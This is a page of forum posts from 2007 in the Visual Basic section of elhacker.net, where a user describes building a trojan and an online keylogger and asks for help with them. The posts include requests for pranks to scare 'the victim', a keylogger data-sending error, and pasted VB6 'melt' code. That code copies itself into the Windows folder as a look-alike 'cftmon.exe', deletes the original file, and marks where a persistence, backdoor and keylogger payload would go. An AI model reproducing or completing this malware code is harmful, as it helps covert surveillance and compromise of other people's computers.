elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


  Mostrar Mensajes
Páginas: 1 2 3 [4] 5 6 7 8 9
31  Programación / Programación Visual Basic / Re: Mi "troyano" en: 24 Mayo 2007, 01:51 am
a mi no me da error nunca  :-\...
pero podrías explicar el código???, los noobs en vb6 te lo agradeceriamos ;D
32  Programación / Programación Visual Basic / Re: Cursor??? en: 24 Mayo 2007, 01:36 am
no hay problema, esperare los code gracias! :P
alguien tiene algun code para hacer que al mover el mouse, vaya dejando un "rastro"?? osea que raye el escritorio de algun color?
gracias! ;D
33  Programación / Programación Visual Basic / Cursor??? en: 24 Mayo 2007, 00:17 am
wenassS
estoy haciendo un troyano desde hace harto tiempo, cuando lo termine lo publico aca para que lo vean  :P
bueno.. la cosa es que ya tiene varias funciones serias, pero no muchas lammeradas... no es que sea lammer, pero muchas veces en un troyano termina siendo divertido asustar un poco a la victima con algunas bromas de buen gusto
lo que se me ocurrio hacer, y lo he visto en troyanos como el darkmoon, es hacer que mientras vaya moviendo el cursor del raton, que vaya dejando un "rastro" me refiero a que vaya rayando su escritorio de algun color, lo otro seria hacer que el maus se vuelva loco, osea que se empieze a mover hacia cualquier lado..
alguien tiene algun code???, si me pueden orientar o ayudar se los agradeceria mucho!
gracias de antemano! ;D
34  Programación / Programación Visual Basic / Re: [Source] Efecto para poner en un "AboutBox Dialog" en: 20 Mayo 2007, 20:44 pm
felicitaciones!!!! muchas gracias, muy buen code  ;D
Lympex tiene razon, este mes has publicado muchos codes, muy utiles!
una vez mas felicitaciones!
35  Programación / Programación Visual Basic / Error con SendData de la api ws! en: 20 Mayo 2007, 19:46 pm
estoy haciendo un keylogger online, y todo va bien hasta que al enviar los datos con un timer, me da error en el modulo de la api de ws, me dice Error '9' en tiempo de ejecución, el subindice esta fuera del intervalo
y apunta a esta linea del modulo de la api de ws

Código:
 Err.Raise Err.Number, "CSocket.SendData", Err.Description

Gracias de antemano ;D
36  Programación / Programación Visual Basic / Re: Mi "troyano" en: 20 Mayo 2007, 17:03 pm
bueno.. tienen razón.. perdon Javi.ID no era mi intencion insultarte.. pero al ve que tenias 1msge, y ese msge era para decir que no funcionaba, pense que solo querias molestar, pero ya veo que no es asi

de todas maneras a mi no me tira ningun error
37  Programación / Programación Visual Basic / Re: Mi "troyano" en: 20 Mayo 2007, 04:52 am
Felicitaciones!!!!
muy bueno! funciona perfectamente

no le agas caso a javi.id, lleva 1msge, lo que significa que postio, solo para fastidiar.. no debe ser mas que un lammer

como dije anteriormente, felicitaciones, va de maravilla
38  Programación / Programación Visual Basic / Re: [Source] How to Melt a file in VB6 en: 19 Mayo 2007, 18:28 pm
me di cuenta de mi error.. me falto una linea ¬¬
pero ahora me sale otro =S
si lo ejecuto sale este error:
  Error '91' en tiempo de ejecución:
  La variable de tipo Object o la variable de bloque With no está establecida
alguien me puede decir que estoy asiendo mal porfavor!?
 les adjunto el code para que vean lo que hice
 
Código:
Dentro del Form1, (form principal)
call Main 'para llamar a la funcion
'i el resto de mi code, que no pongo, para que no se alarge tanto

Dentro de Module1
Private Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFileName As String, ByVal nSize As Long) As Long

Sub Main()
    'Obtenemos el nombre de nuestro ejecutable
    MyName = App.EXEName
   
    'Comprobamos si nos llamamos CTFMON
    If LCase(App.EXEName) = "cftmon" Then
        Call Execute
    Else
        Call MeltFile
    End If
End Sub

Function Execute()
    'Función que se encarga de borrar el archivo original a partir
    'de su ruta. Al terminar ejecuta el PayLoad
   
    On Error Resume Next

    If Not IsEmpty(Command$) Then   'Verificamos si tenemos algo en los argumentos
        While Dir(Command$) <> ""   'Comprobamos si existe el archivo que tenemos en los argumentos
            Kill Command$           '   Si existe... lo borramos
            DoEvents                '   Esperamos un poco
        Wend                        'Bucle
    End If
    Call PayLoad                    'Ejecutamos el resto del Malware
End Function

Function MeltFile()
    'Función que copia el propio Malware en la carpeta TEMP del sistema
    'con el nombre de cftmon.exe. Ejecuta luego el archivo enviando como
    'argumento su propia ruta.
        Dim MySelf As String
    MySelf = String$(255, Chr$(0))

    GetModuleFileName 0, MySelf, Len(MySelf)        'Devuele la ruta correcta de tu aplicación

    FileCopy MySelf, Environ("windir") & "\cftmon.exe" copia  a windows en ves de Temp
    DoEvents                                        'Esperamos...
    Shell Environ("windir") & "\cftmon.exe " & MySelf  'Ejecutamos "windows\cftmon.exe" + Ruta de tu aplicación
    End                                             'Finalizamos (importante! xD)
End Function

Function PayLoad()
    'Aqui incluimos el resto de código de tu Malware...
    'Recomiendo llamar ahora a la función de AddToRegedit() para añadir la
    'aplicación con el Melt (cftmon.exe) al registro, abrir el puerto del troyano
    'activar el keylogger o lo que quieras programar :P
   
    MsgBox "Si estas leyendo esto es que tu aplicación ha hecho MELT y se ha borrado el archivo original, :P", vbInformation, "Melt in VB6"
    End
End Function

no es problema de Shell Environ("windir"), lo he revisado y esta bien.. me sale lo mismo si pongo tmp
39  Programación / Programación Visual Basic / Re: [Source] How to Melt a file in VB6 en: 19 Mayo 2007, 01:50 am
no esta...
se me avia olvidado ponerlo en un modulo, aora lo ise i me apunta a:

 
Código:
GetModuleFileName
i me dise procedimiento sub o function no definido..
40  Programación / Programación Visual Basic / Re: [Source] How to Melt a file in VB6 en: 19 Mayo 2007, 01:40 am
si la tengo...
pero al principio me salia que MyName, no estaba declarado... asique lo declare como string.. o esta mal??=S
Páginas: 1 2 3 [4] 5 6 7 8 9
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines